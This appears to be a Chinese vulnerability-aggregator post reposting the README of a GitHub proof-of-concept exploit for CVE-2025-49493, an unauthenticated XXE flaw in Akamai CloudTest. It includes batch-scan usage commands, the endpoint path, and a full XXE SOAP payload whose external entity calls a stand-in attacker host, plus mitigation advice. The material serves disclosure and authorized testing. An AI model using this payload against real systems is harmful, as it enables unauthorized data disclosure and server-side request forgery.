Akamai CloudTest XML External Entity (XXE) Injection Vulnerability

漏洞信息

漏洞名称: Akamai CloudTest XML External Entity (XXE) Injection Vulnerability

漏洞编号:

  • CVE: CVE-2025-49493

漏洞类型: XML实体注入

漏洞等级: 严重

漏洞描述: Akamai CloudTest是一款广泛使用的云测试服务,旨在帮助企业评估其Web应用程序的性能和安全性。它通常部署在企业级环境中,用于模拟高流量和攻击场景,以确保应用程序的稳定性和安全性。

该漏洞存在于Akamai CloudTest的SOAP服务端点中,具体为/concerto/services/RepositoryService。由于在处理XML输入时未对外部实体进行适当的清理,攻击者可以构造恶意的XML负载来触发XXE攻击。这种类型的漏洞允许攻击者进行信息泄露、服务器端请求伪造(SSRF)、拒绝服务(DoS),甚至在某些配置下可能导致远程代码执行(RCE)。

由于此漏洞不需要认证即可利用,且攻击向量为网络,因此其潜在的安全风险非常高。攻击者可以利用此漏洞远程获取敏感信息,如系统文件内容,或通过SSRF攻击内部网络中的其他服务。此外,由于XXE攻击可以导致服务中断,这对于依赖Akamai CloudTest进行关键业务操作的企业来说,可能会造成严重的业务影响。

产品厂商: Akamai

产品名称: Akamai CloudTest

影响版本: Before 60 2025.06.02 (12988)

来源: https://github.com/SystemVll/CVE-2025-49493

类型: CVE-2025:github search

仓库文件

  • .python-version
  • README.md
  • main.py
  • pyproject.toml
  • targets.txt
  • uv.lock

来源概述

Akamai CloudTest XXE Exploit (CVE-2025-49493)

Overview

This is a Python-based exploit for CVE-2025-49493, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint.

Vulnerability Details

  • CVE ID: CVE-2025-49493
  • Vulnerability Type: XML External Entity (XXE) Injection
  • Severity: Critical (CVSS 9.1)
  • Affected Software: Akamai CloudTest
  • Affected Versions: Before 60 2025.06.02 (12988)
  • Attack Vector: Network
  • Authentication Required: No

Technical Details

The vulnerability exists in the /concerto/services/RepositoryService SOAP endpoint where XML input is processed without proper sanitization of external entities. An attacker can craft malicious XML payloads to trigger XXE attacks, potentially leading to:

  • Information disclosure
  • SSRF (Server-Side Request Forgery)
  • Denial of Service
  • Potential RCE in certain configurations

Features

  • Target Discovery: Automatically identifies Akamai CloudTest instances
  • Vulnerability Detection: Checks for vulnerable endpoints and indicators
  • XXE Exploitation: Sends crafted SOAP requests with XXE payloads
  • Multiple Targets: Supports batch processing from target files
  • Detailed Logging: Comprehensive colored logging with timestamps
  • Error Handling: Robust error handling for network issues

Installation

Prerequisites

  • Python 3.6 or higher
  • pip package manager

Dependencies

Install required packages:

1
pip install -r requirements.txt

Or install manually:

1
pip install requests urllib3 colored pyfiglet

Usage

Basic Usage

1
python main.py targets.txt xxe.attacker.com

Advanced Usage

1
2
3
4
5
## With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

## Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Command Line Options

1
2
3
4
5
6
7
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

Target File Format

Create a targets.txt file with one target per line:

1
2
3
4
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Setting up XXE Server

Option 1: Using Burp Collaborator

  1. Open Burp Suite Professional
  2. Go to Burp > Burp Collaborator client
  3. Click “Copy to clipboard” to get your collaborator URL
  4. Use this URL as the xxe_server parameter

Option 2: Using Interactsh

  1. Install interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Run: interactsh-client
  3. Use the provided URL as the xxe_server parameter

Option 3: Custom HTTP Server

Set up a simple HTTP server to capture requests:

1
2
3
4
5
6
7
8
9
10
11
12
13
## simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Exploit Flow

  1. Target Validation: Validates URL format and accessibility
  2. Vulnerability Detection:
    • Checks for CloudTest indicators in response
    • Verifies SOAP service endpoint exists
  3. XXE Payload Generation: Creates malicious SOAP envelope with XXE
  4. Exploitation: Sends crafted request to vulnerable endpoint
  5. Result Analysis: Analyzes response for success indicators

XXE Payload Structure

The exploit uses the following XXE payload structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Mitigation

For Administrators

  1. Immediate Actions:

    • Update Akamai CloudTest to version 60 2025.06.02 or later
    • Monitor logs for suspicious XML processing activities
    • Implement network segmentation to limit exposure

  2. Long-term Solutions:

    • Disable XML external entity processing in XML parsers
    • Implement input validation and sanitization
    • Use allow-lists for XML processing
    • Regular security assessments

For Developers

  1. Secure XML Processing:

    1
    2
    3
    4
    5
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False

  2. Input Validation:

    • Validate all XML input against strict schemas
    • Sanitize user-controlled data before XML processing
    • Implement proper error handling

References

This tool is provided for educational and authorized testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse or damage caused by this tool.

Contributing

  1. Fork the repository
  2. Create a feature branch
  3. Make your changes
  4. Add tests if applicable
  5. Submit a pull request

License

This project is licensed under the MIT License - see the LICENSE file for details.

Authors

  • Original Research: xbow, 3th1c_yuk1
  • Exploit Development: Security Research Team
  • CVE Assignment: CVE-2025-49493

Changelog

v1.0.0

  • Initial release
  • Basic XXE exploitation functionality
  • Target file support
  • Comprehensive logging
  • Error handling improvements
Github Poc
#CVE-2025:github search #XML实体注入
Akamai CloudTest XML External Entity (XXE) Injection Vulnerability
http://example.com/2025/07/14/github_1400905342/
作者
lianccc
发布于
2025年7月14日
许可协议